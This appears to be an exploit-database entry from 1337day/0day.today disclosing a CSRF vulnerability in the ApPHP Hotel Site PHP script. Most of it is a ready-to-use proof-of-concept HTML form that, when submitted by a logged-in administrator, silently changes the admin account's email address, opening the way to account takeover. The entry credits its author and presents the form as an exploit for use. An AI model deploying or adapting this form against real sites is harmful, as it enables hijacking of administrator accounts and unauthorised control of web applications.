ApPHP Hotel Site CSRF Vulnerability

2012-04-02T00:00:00
ID 1337DAY-ID-17918
Type zdt
Reporter Jonturk75
Modified 2012-04-02T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: ApPHP Hotel Site CSRF
# Author: Jonturk75
# Vendor or Software Link: http://www.scripts.com/viewscript/apphp-hotel-site/29481/
# Category::  webapps
# Demo : http://www.apphp.com/php-hotel-site/examples/sample2/index.php?admin=login
# Greetz: Inj3ct0r Exploit DataBase 1337day.com



<form action="index.php?admin=my_account" method="post">
<input name="submit_type" value="2" type="hidden">
<input name="token" value="19579aa10bca1f6187211973c6278b40" type="hidden">
<input class="form_text" name="admin_email" size="25" maxlength="70" value="[email protected]" type="hidden">
<input class="form_button" name="submit" value="Change" type="submit">
</form>



#  0day.today [2018-03-20]  #